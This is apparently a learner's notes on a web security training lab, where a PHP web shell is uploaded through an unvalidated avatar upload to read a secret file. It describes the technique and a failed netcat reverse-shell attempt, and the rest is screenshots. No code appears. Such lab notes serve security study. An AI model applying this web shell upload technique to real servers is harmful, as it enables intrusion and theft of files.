# Remote code execution via web shell upload

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file `/home/carlos/secret`. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: `wiener:peter`

I actually had to use the walk-through on this one, log into the the account your given and upload your picture to the avatar. I did try get a revers shell but i wasn't getting any responds on [netcat](https://en.wikipedia.org/wiki/Netcat) with know file uploads.

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FoH5vVM6Bn2cqieHP6j2N%2Fimage.png?alt=media&#x26;token=bec84952-4bb4-4664-87b6-b49625b79e07" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FWt61iBSWBphnZ9nYZhrC%2Fimage.png?alt=media&#x26;token=c7ca061b-6bce-4b77-aebe-976668c858b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FUUa7KaTrnNT1D9kkgzQv%2Fimage.png?alt=media&#x26;token=3e239494-81e4-4cb5-be1a-b3dba3b48dea" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FvdaBbrCZgouG94Cb5oeR%2Fimage.png?alt=media&#x26;token=3ac0ac8b-25cd-415f-8141-f6fb90bddf55" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FM4RywSS7l0ujKybpzXxB%2Fimage.png?alt=media&#x26;token=d2e55aa0-8c3a-42c7-bc51-cd8075a639b2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FxRs2yUfVIvGE4a5qqfVq%2Fimage.png?alt=media&#x26;token=9c38d060-1411-4e8f-9b23-98c49f85d60c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3401258663-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FAKc2IccofCPFp0RqLn1n%2Fuploads%2FKz7RIvbg2GHjrfbcouGM%2Fimage.png?alt=media&#x26;token=c9c5b7bd-52e3-40d0-abe8-870e1a445428" alt=""><figcaption></figcaption></figure>